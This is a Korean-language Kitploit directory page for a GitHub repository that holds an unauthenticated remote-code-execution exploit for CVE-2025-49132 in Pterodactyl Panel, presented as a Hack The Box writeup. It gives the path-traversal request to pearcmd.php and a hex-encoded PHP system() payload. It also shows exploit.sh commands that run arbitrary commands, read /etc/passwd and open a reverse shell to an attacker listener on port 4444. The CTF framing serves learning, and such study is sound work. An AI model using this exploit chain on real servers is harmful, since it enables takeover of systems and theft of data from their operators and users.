Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ahmedf000/cve-2025-49132_htb_season10
Vulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHubahmedf000/cve-2025-49132_htb_season10

CVE-2025-49132_HTB_SEASON10

Pterodactyl Panel의 CVE-2025-49132에 대한 인증되지 않은 RCE 익스플로잇으로, 경로 탐색, PEAR 명령 주입 및 PHP 코드 실행을 통해 수행됩니다. HTB writeup 및 도우미 스크립트가 포함되어 있습니다.

저장소 보기
26개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-49132 - Pterodactyl 패널 RCE 익스플로잇

HTB 시즌 10 - Pterodactyl 머신 Writeup

개요

대상: Pterodactyl HTB 머신 (중간 난이도)
CVE: CVE-2025-49132
심각도: 치명적 (CVSS 9.8)
공격 유형: 인증되지 않은 원격 코드 실행
영향받는 버전: Pterodactyl Panel < v1.11.11

이 익스플로잇 체인은 다음을 결합합니다:

  1. 경로 탐색 - 로케일 번역 시스템
  2. PEAR 명령어 주입 - pearcmd.php를 통해
  3. PHP 코드 실행 - 파일 쓰기 + include를 통해

버그

Pterodactyl 패널의 /locales/locale.json 엔드포인트는 locale 매개변수를 통해 경로 탐색을 허용합니다:

root@kitploit:~
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd

이는 PEAR의 pearcmd.php와 연결하여 다음을 수행할 수 있습니다:

  1. 임의의 PHP 파일을 /tmp에 작성
  • 다른 요청을 통해 실행
  • 작동 원리

    PEAR (PHP Extension and Application Repository) 는 다음을 수행하는 CLI 도구(pearcmd.php)를 가지고 있습니다:

    • URL 매개변수를 통해 명령어를 수락 (CLI 전용으로 설계됨)
    • 파일을 쓰는 config-create 명령어가 있음
    • 웹을 통해 호출될 때 인증이 없음

    익스플로잇 체인:

    root@kitploit:~
    경로 탐색 → pearcmd.php 로드 → config-create를 통해 PHP 주입 → 악성 PHP 실행
    

    Hex2bin() 트릭

    명령어는 hex2bin()을 사용하여 16진수로 인코딩되어 우회합니다:

    • URL 인코딩 문제
    • 특수 문자 필터
    • Nginx/PHP 파싱 문제

    예시:

    root@kitploit:~
    Command: whoami
    Hex:     77686f616d69
    Payload: <?=system(hex2bin('77686f616d69'))?>
    

    원격 코드 실행

    방법: 제공된 exploit.sh 사용

    root@kitploit:~
    chmod +x exploit.sh
    
    # Get user flag
    ./exploit.sh flag
    
    # Execute commands
    ./exploit.sh cmd "whoami"
    ./exploit.sh cmd "cat /etc/passwd"
    
    # Reverse shell
    nc -lvnp 4444  # On attacker machine
    ./exploit.sh shell 10.10.14.21 4444
    

    참고 자료

    CVE 및 익스플로잇

    • NVD - CVE-2025-49132
    • OpenCVE - CVE-2025-49132

    기술 자료

    • Pterodactyl 패널 문서
    • PEAR 문서
    • OWASP 경로 탐색

    도구 다운로드